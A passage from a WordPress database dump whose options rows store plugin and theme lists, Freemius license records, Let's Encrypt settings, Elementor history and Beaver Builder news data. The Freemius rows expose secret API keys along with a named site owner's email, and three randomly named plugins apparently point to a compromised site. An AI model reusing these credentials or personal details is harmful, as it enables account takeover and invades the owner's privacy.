Evolved\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"3.6.2\";}s:23:\"wordfence/wordfence.php\";a:6:{s:4:\"slug\";s:9:\"wordfence\";s:7:\"version\";s:5:\"7.5.3\";s:5:\"title\";s:18:\"Wordfence Security\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"7.9.2\";}s:37:\"wp-letsencrypt-ssl/wp-letsencrypt.php\";a:6:{s:4:\"slug\";s:18:\"wp-letsencrypt-ssl\";s:7:\"version\";s:5:\"5.4.2\";s:5:\"title\";s:43:\"WP Encryption - One Click SSL & Force HTTPS\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:6:\"5.11.3\";}s:31:\"wp-statistics/wp-statistics.php\";a:6:{s:4:\"slug\";s:13:\"wp-statistics\";s:7:\"version\";s:6:\"13.0.8\";s:5:\"title\";s:13:\"WP Statistics\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:6:\"14.0.2\";}s:23:\"elementor/elementor.php\";a:6:{s:4:\"slug\";s:9:\"elementor\";s:7:\"version\";s:5:\"3.2.3\";s:5:\"title\";s:9:\"Elementor\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:6:\"3.12.0\";}s:33:\"auxin-elements/auxin-elements.php\";a:6:{s:4:\"slug\";s:14:\"auxin-elements\";s:7:\"version\";s:6:\"2.7.13\";s:5:\"title\";s:19:\"Phlox Core Elements\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:6:\"2.11.2\";}s:59:\"disable-remove-google-fonts/disable-remove-google-fonts.php\";a:6:{s:4:\"slug\";s:27:\"disable-remove-google-fonts\";s:7:\"version\";s:5:\"1.5.2\";s:5:\"title\";s:29:\"Disable & Remove Google Fonts\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:5:\"1.5.4\";}s:31:\"elementor-pro/elementor-pro.php\";a:6:{s:4:\"slug\";s:13:\"elementor-pro\";s:7:\"version\";s:5:\"3.5.1\";s:5:\"title\";s:13:\"Elementor Pro\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;s:7:\"Version\";s:6:\"3.11.7\";}s:27:\"lywajybybyp/lywajybybyp.php\";a:5:{s:4:\"slug\";s:11:\"lywajybybyp\";s:7:\"version\";s:5:\"1.1.8\";s:5:\"title\";s:11:\"Lywajybybyp\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:21:\"kyvomyco/kyvomyco.php\";a:5:{s:4:\"slug\";s:8:\"kyvomyco\";s:7:\"version\";s:0:\"\";s:5:\"title\";s:17:\"vabagawakhypimoza\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:23:\"gabotyqoj/gabotyqoj.php\";a:5:{s:4:\"slug\";s:9:\"gabotyqoj\";s:7:\"version\";s:6:\"1.12.3\";s:5:\"title\";s:9:\"Gabotyqoj\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}}}s:10:\"all_themes\";O:8:\"stdClass\":3:{s:9:\"timestamp\";i:1680116520;s:3:\"md5\";s:32:\"d8eb0b6a96bc5444bd64fbd5863f3553\";s:6:\"themes\";a:3:{s:5:\"phlox\";a:5:{s:4:\"slug\";s:5:\"phlox\";s:7:\"version\";s:6:\"2.11.1\";s:5:\"title\";s:5:\"Phlox\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:15:\"twentytwentytwo\";a:5:{s:4:\"slug\";s:15:\"twentytwentytwo\";s:7:\"version\";s:3:\"1.3\";s:5:\"title\";s:17:\"Twenty Twenty-Two\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}s:17:\"twentytwentythree\";a:5:{s:4:\"slug\";s:17:\"twentytwentythree\";s:7:\"version\";s:3:\"1.0\";s:5:\"title\";s:19:\"Twenty Twenty-Three\";s:9:\"is_active\";b:0;s:14:\"is_uninstalled\";b:0;}}}s:5:\"sites\";a:1:{s:18:\"wp-letsencrypt-ssl\";O:7:\"FS_Site\":25:{s:7:\"site_id\";s:8:\"97927524\";s:9:\"plugin_id\";s:4:\"5090\";s:7:\"user_id\";s:7:\"4776342\";s:5:\"title\";s:10:\"ictbank.ir\";s:3:\"url\";s:22:\"http://ictbank.ir/blog\";s:7:\"version\";s:6:\"5.11.3\";s:8:\"language\";s:5:\"en-US\";s:16:\"platform_version\";s:5:\"6.1.1\";s:11:\"sdk_version\";s:5:\"2.5.3\";s:28:\"programming_language_version\";s:6:\"7.4.32\";s:7:\"plan_id\";s:4:\"8209\";s:10:\"license_id\";N;s:13:\"trial_plan_id\";N;s:10:\"trial_ends\";N;s:10:\"is_premium\";b:0;s:15:\"is_disconnected\";b:0;s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;s:7:\"is_beta\";b:0;s:10:\"public_key\";s:32:\"pk_e8cfc11b4bc1e06b3d85a1a2d0c84\";s:10:\"secret_key\";s:32:\"sk_Se@R6uoL9RCAadrDz.KZmEVCq!CYI\";s:2:\"id\";s:7:\"7404904\";s:7:\"updated\";s:19:\"2023-02-09 15:24:48\";s:7:\"created\";s:19:\"2021-05-20 08:30:25\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:5:\"users\";a:1:{i:4776342;O:7:\"FS_User\":12:{s:5:\"email\";s:25:\"masoud.nikoofar@gmail.com\";s:5:\"first\";s:6:\"Masoud\";s:4:\"last\";s:8:\"Nikoofar\";s:11:\"is_verified\";b:1;s:11:\"customer_id\";N;s:5:\"gross\";i:0;s:10:\"public_key\";s:32:\"pk_4a7efdae518243e091fceddc35d8b\";s:10:\"secret_key\";s:32:\"sk_0qC&U*hJS5sAfS]_sO.!%E0v3:7X8\";s:2:\"id\";s:7:\"4776342\";s:7:\"updated\";N;s:7:\"created\";s:19:\"2021-05-20 08:30:24\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:23:\"user_id_license_ids_map\";a:1:{i:5090;a:1:{i:4776342;a:0:{}}}s:12:\"all_licenses\";a:1:{i:5090;a:0:{}}s:7:\"updates\";a:1:{i:5090;N;}s:13:\"admin_notices\";a:1:{s:18:\"wp-letsencrypt-ssl\";a:0:{}}}','yes'),
(100726,'fs_gdpr','a:1:{s:2:\"u2\";a:2:{s:8:\"required\";b:0;s:18:\"show_opt_in_notice\";b:0;}}','yes'),
(100727,'fs_api_cache','a:0:{}','no'),
(100730,'wple_opts','a:13:{s:5:\"email\";s:25:\"masoud.nikoofar@gmail.com\";s:4:\"date\";s:10:\"20-05-2021\";s:6:\"expiry\";s:0:\"\";s:4:\"type\";s:6:\"single\";s:10:\"send_usage\";i:0;s:11:\"include_www\";i:1;s:13:\"agree_gws_tos\";i:1;s:12:\"agree_le_tos\";i:1;s:6:\"subdir\";i:1;s:6:\"domain\";s:10:\"ictbank.ir\";s:14:\"dns_challenges\";a:2:{i:0;s:55:\"ictbank.ir||_CEeBAnblKbJIWe21OoM8WBy22M8dBTU6Qs8cKV0aoA\";i:1;s:59:\"www.ictbank.ir||gRTY5mHnWKQ5-kHnsWAYIQKwqPUE5IHfxdmUgY8857U\";}s:15:\"challenge_files\";a:2:{i:0;a:2:{s:4:\"file\";s:43:\"I67kVwCCeHPuX_xybmmy1l-E6jNEjBb5Tw7s9N3Hub0\";s:5:\"value\";s:87:\"I67kVwCCeHPuX_xybmmy1l-E6jNEjBb5Tw7s9N3Hub0.Gz18OBo0dNHIMJYSbQi1MhEHAVMSBUuoLd-pP7fSW_k\";}i:1;a:2:{s:4:\"file\";s:43:\"zfH5um5zZMYMdB8YdZM6k_rUgXObl--SIxLJ2ClzwRM\";s:5:\"value\";s:87:\"zfH5um5zZMYMdB8YdZM6k_rUgXObl--SIxLJ2ClzwRM.Gz18OBo0dNHIMJYSbQi1MhEHAVMSBUuoLd-pP7fSW_k\";}}s:9:\"force_ssl\";i:0;}','yes'),
(100736,'_site_transient_timeout_locked_2','1936859427','no'),
(100737,'_site_transient_locked_2','1','no'),
(100741,'wple_send_usage','0','yes'),
(100845,'elementor_version','3.29.2','yes'),
(100846,'elementor_install_history','a:56:{s:5:\"3.2.3\";i:1621511149;s:5:\"3.2.5\";i:1624285103;s:5:\"3.3.1\";i:1628194897;s:5:\"3.4.5\";i:1634130786;s:5:\"3.4.8\";i:1637334231;s:5:\"3.5.1\";i:1675956222;s:5:\"3.5.2\";i:1640589249;s:5:\"3.5.3\";i:1641131048;s:5:\"3.5.4\";i:1643794641;s:5:\"3.5.5\";i:1645209111;s:5:\"3.5.6\";i:1646473392;s:5:\"3.6.3\";i:1649858796;s:5:\"3.7.0\";i:1660396170;s:5:\"3.8.1\";i:1670069971;s:6:\"3.10.0\";i:1675956223;s:6:\"3.10.2\";i:1677259080;s:6:\"3.10.3\";i:1677259079;s:6:\"3.11.1\";i:1681833838;s:6:\"3.11.7\";i:1682954367;s:6:\"3.12.0\";i:1680115771;s:6:\"3.12.1\";i:1682954368;s:6:\"3.12.2\";i:1682959538;s:6:\"3.12.3\";i:1684572942;s:6:\"3.13.0\";i:1683561821;s:6:\"3.13.1\";i:1683658495;s:6:\"3.13.2\";i:1684572943;s:6:\"3.13.3\";i:1684869137;s:6:\"3.13.4\";i:1685300694;s:6:\"3.14.1\";i:1688202837;s:6:\"3.15.0\";i:1690824132;s:6:\"3.15.2\";i:1692812466;s:6:\"3.15.3\";i:1692813154;s:6:\"3.16.1\";i:1694548434;s:6:\"3.16.3\";i:1695024368;s:6:\"3.16.4\";i:1696241218;s:6:\"3.16.5\";i:1697045150;s:6:\"3.16.6\";i:1697574244;s:6:\"3.17.1\";i:1698264447;s:6:\"3.17.2\";i:1698868206;s:6:\"3.17.3\";i:1699473099;s:6:\"3.18.0\";i:1701705976;s:6:\"3.18.3\";i:1703857267;s:6:\"3.19.0\";i:1706544346;s:6:\"3.19.1\";i:1707148913;s:6:\"3.20.3\";i:1712120346;s:6:\"3.20.4\";i:1712816154;s:6:\"3.21.0\";i:1713197225;s:6:\"3.22.3\";i:1720765499;s:6:\"3.23.1\";i:1721072360;s:6:\"3.23.2\";i:1721763898;s:6:\"3.23.3\";i:1723447899;s:6:\"3.23.4\";i:1723448239;s:6:\"3.26.5\";i:1737382168;s:6:\"3.27.0\";i:1737383516;s:6:\"3.28.3\";i:1745295170;s:6:\"3.29.2\";i:1750871791;}','yes'),
(100849,'_elementor_installed_time','1621511158','yes'),
(100850,'elementor_active_kit','345','yes'),
(100854,'elementor_remote_info_library','a:3:{s:10:\"types_data\";a:4:{s:5:\"block\";a:2:{s:10:\"categories\";a:30:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:8:\"Benefits\";i:4;s:14:\"call to action\";i:5;s:7:\"clients\";i:6;s:7:\"contact\";i:7;s:4:\"Data\";i:8;s:10:\"ehp-footer\";i:9;s:10:\"ehp-header\";i:10;s:3:\"faq\";i:11;s:8:\"features\";i:12;s:6:\"footer\";i:13;s:7:\"Gallery\";i:14;s:6:\"header\";i:15;s:4:\"hero\";i:16;s:11:\"Link in Bio\";i:17;s:9:\"portfolio\";i:18;s:7:\"pricing\";i:19;s:15:\"product archive\";i:20;s:5:\"Quote\";i:21;s:15:\"Service Details\";i:22;s:8:\"services\";i:23;s:11:\"single page\";i:24;s:11:\"single post\";i:25;s:14:\"single product\";i:26;s:5:\"stats\";i:27;s:9:\"subscribe\";i:28;s:4:\"team\";i:29;s:12:\"testimonials\";}s:4:\"sets\";a:5:{i:0;s:11:\"Boxing Club\";i:1;s:19:\"Business Consultant\";i:2;s:16:\"Marketing Agency\";i:3;s:9:\"Wireframe\";i:4;s:15:\"Workshop Center\";}}s:5:\"popup\";a:1:{s:10:\"categories\";a:6:{i:0;s:10:\"bottom bar\";i:1;s:7:\"classic\";i:2;s:6:\"fly-in\";i:3;s:11:\"full screen\";i:4;s:9:\"hello bar\";i:5;s:8:\"slide-in\";}}s:2:\"lp\";a:1:{s:10:\"categories\";a:15:{i:0;s:8:\"Business\";i:1;s:16:\"Coming Soon Page\";i:2;s:9:\"eCommerce\";i:3;s:9:\"Education\";i:4;s:6:\"Events\";i:5;s:18:\"Health and Fitness\";i:6;s:3:\"NFT\";i:7;s:14:\"Online Service\";i:8;s:7:\"Product\";i:9;s:11:\"Real Estate\";i:10;s:18:\"Social Involvement\";i:11;s:14:\"Thank You Page\";i:12;s:6:\"Travel\";i:13;s:18:\"Under Construction\";i:14;s:9:\"Wireframe\";}}s:2:\"lb\";a:1:{s:10:\"categories\";a:2:{i:0;s:4:\"post\";i:1;s:7:\"product\";}}}s:10:\"categories\";a:30:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:8:\"Benefits\";i:4;s:14:\"call to action\";i:5;s:7:\"clients\";i:6;s:7:\"contact\";i:7;s:4:\"Data\";i:8;s:10:\"ehp-footer\";i:9;s:10:\"ehp-header\";i:10;s:3:\"faq\";i:11;s:8:\"features\";i:12;s:6:\"footer\";i:13;s:7:\"Gallery\";i:14;s:6:\"header\";i:15;s:4:\"hero\";i:16;s:11:\"Link in Bio\";i:17;s:9:\"portfolio\";i:18;s:7:\"pricing\";i:19;s:15:\"product archive\";i:20;s:5:\"Quote\";i:21;s:15:\"Service Details\";i:22;s:8:\"services\";i:23;s:11:\"single page\";i:24;s:11:\"single post\";i:25;s:14:\"single product\";i:26;s:5:\"stats\";i:27;s:9:\"subscribe\";i:28;s:4:\"team\";i:29;s:12:\"testimonials\";}s:9:\"templates\";a:4:{i:0;a:20:{s:4:\"tmpl\";i:1254;s:2:\"id\";i:20472;s:5:\"title\";s:10:\"test ido f\";s:9:\"thumbnail\";s:153:\"https://library.stg.elementor.red/wp-content/uploads/2025/01/png-clipart-logo-harry-potter-literary-series-lord-voldemort-film-harry-potter-thumbnail.png\";s:12:\"tmpl_created\";i:1751356263;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.stg.elementor.red/blocks/test-ido-f/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:1;a:20:{s:4:\"tmpl\";i:1227;s:2:\"id\";i:19968;s:5:\"title\";s:12:\"Zeyad Test 1\";s:9:\"thumbnail\";s:83:\"https://library.stg.elementor.red/wp-content/uploads/2022/09/boxking_hero_img_2.jpg\";s:12:\"tmpl_created\";i:1670765723;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.stg.elementor.red/blocks/zeyad-test-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:20;}i:2;a:20:{s:4:\"tmpl\";i:1231;s:2:\"id\";i:19494;s:5:\"title\";s:5:\"test2\";s:9:\"thumbnail\";s:83:\"https://library.stg.elementor.red/wp-content/uploads/2022/09/boxking_hero_img_4.jpg\";s:12:\"tmpl_created\";i:1672308146;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.stg.elementor.red/blocks/test2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:2;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:20;}i:3;a:20:{s:4:\"tmpl\";i:1209;s:2:\"id\";i:9631;s:5:\"title\";s:38:\"Slide-in | Sale | Register | Subscribe\";s:9:\"thumbnail\";s:87:\"https://library.stg.elementor.red/wp-content/uploads/2019/01/Slide-in_Sale_small_01.png\";s:12:\"tmpl_created\";i:1660034300;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.stg.elementor.red/popups/slide-in-sale-01/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:142;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}}}','off'),
(100855,'elementor_remote_info_feed_data','a:3:{i:0;a:5:{s:5:\"title\";s:70:\"Introducing Elementor 3.31: New Editor V4 Variables, Filters, and More\";s:7:\"excerpt\";s:294:\"Elementor 3.31 is here, pushing Editor V4 forward with powerful design system enhancements and modern visual styling tools. From Variables and Filters to smarter editing workflows and semantic markup, this version makes it easier than ever to design beautiful, performant, and accessible sites.\";s:7:\"created\";i:1755094220;s:5:\"badge\";s:3:\"NEW\";s:3:\"url\";s:140:\"https://elementor.com/blog/elementor-331-v4-alpha-variables-filters/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:1;a:5:{s:5:\"title\";s:67:\"What Is an MCP? The AI Breakthrough Web Creators Shouldn’t Ignore\";s:7:\"excerpt\";s:143:\"Discover how Model Context Protocol (MCP) is shaping AI-tool interaction and redefining how pro web creators build, manage, and scale websites.\";s:7:\"created\";i:1754310811;s:5:\"badge\";s:0:\"\";s:3:\"url\";s:130:\"https://elementor.com/blog/mcp-explained-for-web-creators/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:2;a:5:{s:5:\"title\";s:100:\"Introducing Elementor 3.30: new Editor V4 capabilities, full Website Templates in the cloud, & more!\";s:7:\"excerpt\";s:361:\"Elementor 3.30 is here and it includes upgrades that accelerate your workflow, bring you a step closer to the full power of Editor V4, and help you deliver beautiful, accessible websites faster than ever. From advanced styling tools and smarter editing to full Website Templates in the cloud, this release enhances both the way you design and the way you scale.\";s:7:\"created\";i:1751974442;s:5:\"badge\";s:3:\"NEW\";s:3:\"url\";s:140:\"https://elementor.com/blog/elementor-330-v4-alpha-website-templates/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}}','off'),
(100909,'widget_block','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(100910,'gutenberg_version_migration','9.8.0','yes'),
(100959,'_fl_builder_version','2.4.2.2','no'),
(100960,'fl_builder_usage_enabled','0','no'),
(100962,'fl_notifications','a:3:{s:4:\"read\";b:1;s:8:\"checksum\";a:10:{i:577785;i:1710253639;i:518303;i:1106591042;i:455558;i:406587483;i:434899;i:1478620429;i:430933;i:4163977558;i:423877;i:1288974002;i:421774;i:2596226902;i:416381;i:4057906106;i:408945;i:3347767542;i:404849;i:3072290128;}s:4:\"data\";s:21055:\"[{\"id\":577785,\"date\":\"2020-12-02T11:20:32\",\"date_gmt\":\"2020-12-02T19:20:32\",\"guid\":{\"rendered\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?post_type=fl_notification&p=577785\"},\"modified\":\"2020-12-02T11:20:32\",\"modified_gmt\":\"2020-12-02T19:20:32\",\"slug\":\"beaver-builder-2-4-oshaughnessy-free-version-update-new-modules-assistant-integration\",\"status\":\"publish\",\"type\":\"fl_notification\",\"link\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?fl_notification=beaver-builder-2-4-oshaughnessy-free-version-update-new-modules-assistant-integration\",\"title\":{\"rendered\":\"Beaver Builder 2.4 \\u201cO\\u2019Shaughnessy\\u201d \\u2013 Free Version Update, New Modules, Assistant Integration\"},\"content\":{\"rendered\":\"<p><img loading=\\\"lazy\\\" class=\\\"alignnone wp-image-516371\\\" src=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2020\\/05\\/2.4-oshaughnessy.jpg\\\" alt=\\\"\\\" width=\\\"318\\\" height=\\\"139\\\" \\/><\\/p>\\n<p>Hi there! Exciting news, we have a major update just released. Beaver Builder 2.4 \\u201cO\'Shaughnessy\\u201d \\u2013 named after the O\'Shaughnessy Dam in Yosemite Park \\u2013 features new modules, templates, and some additions to the free version of Beaver Builder! Along with various other enhancements and fixes, 2.4 also brings all of the power of our new plugin, Assistant, to Beaver Builder\\u2026<\\/p>\\n\",\"protected\":false},\"template\":\"\",\"meta\":{\"om_disable_all_campaigns\":false,\"_fl_notification\":[\"https:\\/\\/www.wpbeaverbuilder.com\\/beaver-builder-2-4-oshaughnessy\\/\"],\"_links_to\":\"\",\"_links_to_target\":\"\"},\"_links\":{\"self\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\\/577785\"}],\"collection\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\"}],\"about\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/types\\/fl_notification\"}],\"wp:attachment\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/media?parent=577785\"}],\"curies\":[{\"name\":\"wp\",\"href\":\"https:\\/\\/api.w.org\\/{rel}\",\"templated\":true}]}},{\"id\":518303,\"date\":\"2019-11-29T00:32:39\",\"date_gmt\":\"2019-11-29T08:32:39\",\"guid\":{\"rendered\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?post_type=fl_notification&p=518303\"},\"modified\":\"2019-11-29T00:32:39\",\"modified_gmt\":\"2019-11-29T08:32:39\",\"slug\":\"autumn-update-black-friday-and-beaver-builder-2-3\",\"status\":\"publish\",\"type\":\"fl_notification\",\"link\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?fl_notification=autumn-update-black-friday-and-beaver-builder-2-3\",\"title\":{\"rendered\":\"Autumn Update – Black Friday and Beaver Builder 2.3\"},\"content\":{\"rendered\":\"<p><img loading=\\\"lazy\\\" class=\\\"alignnone wp-image-516371\\\" src=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/11\\/1_-L8ZwY-1024x448.jpg\\\" alt=\\\"\\\" width=\\\"318\\\" height=\\\"139\\\" srcset=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/11\\/1_-L8ZwY-1024x448.jpg 1024w, https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/11\\/1_-L8ZwY-300x131.jpg 300w, https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/11\\/1_-L8ZwY-768x336.jpg 768w, https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/11\\/1_-L8ZwY-400x175.jpg 400w, https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/11\\/1_-L8ZwY.jpg 1464w\\\" sizes=\\\"(max-width: 318px) 100vw, 318px\\\" \\/><\\/p>\\n<p>Hey all! We hope you\'re doing great. It\'s been a little while since our last update post.\\u00a0For this post, I wanted to share some of our internal news, product updates, future plans, and annual Black Friday sale. Click to read more…<\\/p>\\n\",\"protected\":false},\"template\":\"\",\"meta\":{\"om_disable_all_campaigns\":false,\"_fl_notification\":[\"https:\\/\\/www.wpbeaverbuilder.com\\/autumn-update-black-friday-and-beaver-builder-2-3\\/\"],\"_links_to\":\"\",\"_links_to_target\":\"\"},\"_links\":{\"self\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\\/518303\"}],\"collection\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\"}],\"about\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/types\\/fl_notification\"}],\"wp:attachment\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/media?parent=518303\"}],\"curies\":[{\"name\":\"wp\",\"href\":\"https:\\/\\/api.w.org\\/{rel}\",\"templated\":true}]}},{\"id\":455558,\"date\":\"2019-04-30T15:21:14\",\"date_gmt\":\"2019-04-30T22:21:14\",\"guid\":{\"rendered\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?post_type=fl_notification&p=455558\"},\"modified\":\"2019-04-30T15:21:14\",\"modified_gmt\":\"2019-04-30T22:21:14\",\"slug\":\"spring-update-cherry-blossoms-new-hires-and-new-products\",\"status\":\"publish\",\"type\":\"fl_notification\",\"link\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?fl_notification=spring-update-cherry-blossoms-new-hires-and-new-products\",\"title\":{\"rendered\":\"Spring Update \\u2013 Cherry Blossoms, New Hires, and New Products\"},\"content\":{\"rendered\":\"\\n<div class=\\\"wp-block-image\\\"><figure class=\\\"aligncenter\\\"><img loading=\\\"lazy\\\" width=\\\"318\\\" height=\\\"139\\\" src=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/04\\/spring-update-notification.jpg\\\" alt=\\\"\\\" class=\\\"wp-image-455560\\\" srcset=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/04\\/spring-update-notification.jpg 318w, https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/04\\/spring-update-notification-300x131.jpg 300w\\\" sizes=\\\"(max-width: 318px) 100vw, 318px\\\" \\/><\\/figure><\\/div>\\n\\n\\n\\n<p>Hey all! Happy Spring. The Beaver Builder team continues to grow and I\\u2019m excited to introduce two new members. We\\u2019re also growing our product line, and we have recently announced a very early version of a new project we\\u2019ve been working on, Assistant.<\\/p>\\n\",\"protected\":false},\"template\":\"\",\"meta\":{\"om_disable_all_campaigns\":false,\"_fl_notification\":[\"https:\\/\\/www.wpbeaverbuilder.com\\/spring-update-cherry-blossoms-new-hires-and-new-products\\/\"],\"_links_to\":\"\",\"_links_to_target\":\"\"},\"_links\":{\"self\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\\/455558\"}],\"collection\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/fl_notification\"}],\"about\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/types\\/fl_notification\"}],\"wp:attachment\":[{\"href\":\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-json\\/wp\\/v2\\/media?parent=455558\"}],\"curies\":[{\"name\":\"wp\",\"href\":\"https:\\/\\/api.w.org\\/{rel}\",\"templated\":true}]}},{\"id\":434899,\"date\":\"2019-02-22T00:04:57\",\"date_gmt\":\"2019-02-22T08:04:57\",\"guid\":{\"rendered\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?post_type=fl_notification&p=434899\"},\"modified\":\"2019-02-22T00:05:00\",\"modified_gmt\":\"2019-02-22T08:05:00\",\"slug\":\"3-reasons-why-wordpress-agencies-love-beaver-builder\",\"status\":\"publish\",\"type\":\"fl_notification\",\"link\":\"https:\\/\\/www.wpbeaverbuilder.com\\/?fl_notification=3-reasons-why-wordpress-agencies-love-beaver-builder\",\"title\":{\"rendered\":\"3 Reasons Why WordPress Agencies Love Beaver Builder\"},\"content\":{\"rendered\":\"\\n<div class=\\\"wp-block-image\\\"><figure class=\\\"aligncenter\\\"><img loading=\\\"lazy\\\" width=\\\"318\\\" height=\\\"139\\\" src=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/02\\/why-agencies-love-bb-notification.jpg\\\" alt=\\\"\\\" class=\\\"wp-image-434901\\\" srcset=\\\"https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/02\\/why-agencies-love-bb-notification.jpg 318w, https:\\/\\/www.wpbeaverbuilder.com\\/wp-content\\/uploads\\/2019\\/02\\/why-agencies-love-bb-notification-300x131.jpg 300w\\\" sizes=\\\"(max-width: 318px) 100vw, 318px\\\" \\/><\\/figure><\\/div>\\n\\n\\n\\n<p>Ever wonder why the biggest companies and agencies in the WordPress space choose Beaver Builder? Companies like Crowd Favorite, GoDaddy, and WP Engine? In this <g class=\\\"gr_ gr_44 gr-alert gr_gramm gr_inline_cards gr_run_anim Punctuation only-ins replaceWithoutSep\\\" id=\\\"44\\\" data-gr-id=\\\"44\\\">article<\\/g> we discuss three reasons why agencies 